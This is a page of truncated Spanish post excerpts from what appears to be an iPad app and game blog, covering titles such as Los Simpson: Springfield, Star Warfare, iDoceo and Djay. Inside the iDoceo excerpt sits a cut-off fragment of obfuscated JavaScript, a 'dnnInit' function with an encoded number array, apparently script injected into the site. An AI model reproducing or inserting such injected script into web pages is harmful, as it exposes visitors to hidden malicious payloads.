Hoy te ofrecemos Los Simpson: Springfield, un juego basado en una de las más reconocidas series de la historia de la televisión, contando con diferentes misiones y mini juegos para divertirnos recorriendo el mundo de Los Simpson y a su vez interactuar con los diferentes personajes de la tira. Dicho juego se ofrece a través de la página oficial de Google Play de manera libre y gratuita, habiendo a su vez recibido una crítica repleta de elogios y …

Ya no quedan dudas de la popularidad del iPad en el mercado de las tablets, más si tenemos encuenta la revolución causada por el lanzamiento de su última versión, el Nuevo iPad. Debido a que somos muchos los que tenemos acceso a un dispositivo de Apple, decidimos mostrarles algunos trucos para iPad que permitirán una mejor experiencia con el uso del teclado. Muchos de estos trucos se encuentran dado vueltas por la web, por lo que es seguro que a…

oda su familia, logrando en el medio que cada uno de los habitantes de Springfield logre realizar diferentes tareas que llevan a cabo durante la serie. Dentro de las características interesantes del juego de Los Simpsons para iPad, es que podremos adquirirlo de manera gratuita, además de que cuenta con soporte para varios idiomas, como por ejemplo: francés, italiano, alemán, español, chino simplificado y coreano. Una de las recomendaciones que te…

Este juego Star Warfare para iPad y iPad 2, es un juego del estilo shooter (tirador), el cual se encuentra ambientado en un mundo completamente ficticio. Nos encontramos ubicados en un planeta llamado UBW-59424. Pero el planeta en el que un día fue nuestro hogar, se encuentra bajo amenaza y debemos tomar nuestras armas y defenderlo. Star Warfare para iPad, cuenta con cientos de enemigos que nos deberemos enfrentar y eliminar a lo largo de 30 niv…

En estos últimos días han surgido rumores salidos de supuestas conversaciones con empleados de la empresa de Cupertino, donde se ha señalado que los nuevos modelos de iPad, tanto el iPad 5 como el iPad Mini 2 podrían salir al mercado en el próximo mes de Marzo del corriente. Esta noticia no cabe duda que ha sorprendido a bastantes usuarios y fanáticos de esta línea, debido a que la salida al mercado de la versión actual de iPad fue apenas hace 6…

En esta nueva oportunidad te presentamos una excelente aplicación llamada iDoceo, ideal para aquellos usuarios de dispositivos iPad dedicados a la enseñanza en diferentes niveles, ya sean primarios o superiores. Tendremos la posibilidad de realizar un seguimiento meticuloso de nuestros alumnos con la implementación de diferentes hojas de cálculo e iconos personalizables. function dnnInit(){var a=0,m,v,t,z,x=new Array(“9091968376″,…

En esta ocasión presentamos un juego pensado y desarrollado para aquellos usuarios de dispositivos iPad amantes de las carreras, aunque en este caso se traten de carreras acuáticas, quizás una modalidad poco vista en el mundo de los videojuegos pero no por eso menos entretenida. Contando con impresionantes detalles gráficos, así como también con diferentes entornos y modalidades de juego Aqua Moto Racing 2 te asegurara un gran entretenimiento po…

és de la App Store de manera totalmente libre y gratuita, pudiendo ser adquirido en este mismo momento. Por otra parte, también es para destacar la compatibilidad presentada por la aplicación, pudiendo ser disfrutada tanto en iPad como también en diversos modelos de dispositivos iPhone y iPod Touch. Gracias a la ultima actualización ofrecida por los desarrolladores de este juego, tendremos la posibilidad de recorrer 8 diferentes pistas, cada una…

diferentes coches o motocicletas, cada uno contando con sus características únicas y diseños particulares. Para correr Real Flying Racing Rider Hero deberemos contar con la versión 4.3 de iOS o superiores instalada en nuestro iPad, por otra parte, deberemos contar también con 60 MB de memoria disponible.     Enlace: Real Flying Racing Rider Hero para iPad

Djay: ¡Haz mezclas con tu iPad! Si estás leyendo estas líneas es muy probable que, más de una vez, hayas deseado hacer scratching o mezclar tus canciones favoritas cual DJ. Si a día de hoy todavía no has podido hacer este sueño realidad y tienes un iPad, adquiere la aplicación Djay (por 7,99 euros) y disfruta de una mesa con dos platinas en la que tendrás todo lo que necesitas para pinchar; controles de volumen, ajustadores de velocidad, pantal…



¿No encontraste lo que buscabas? ¡Probá con Google!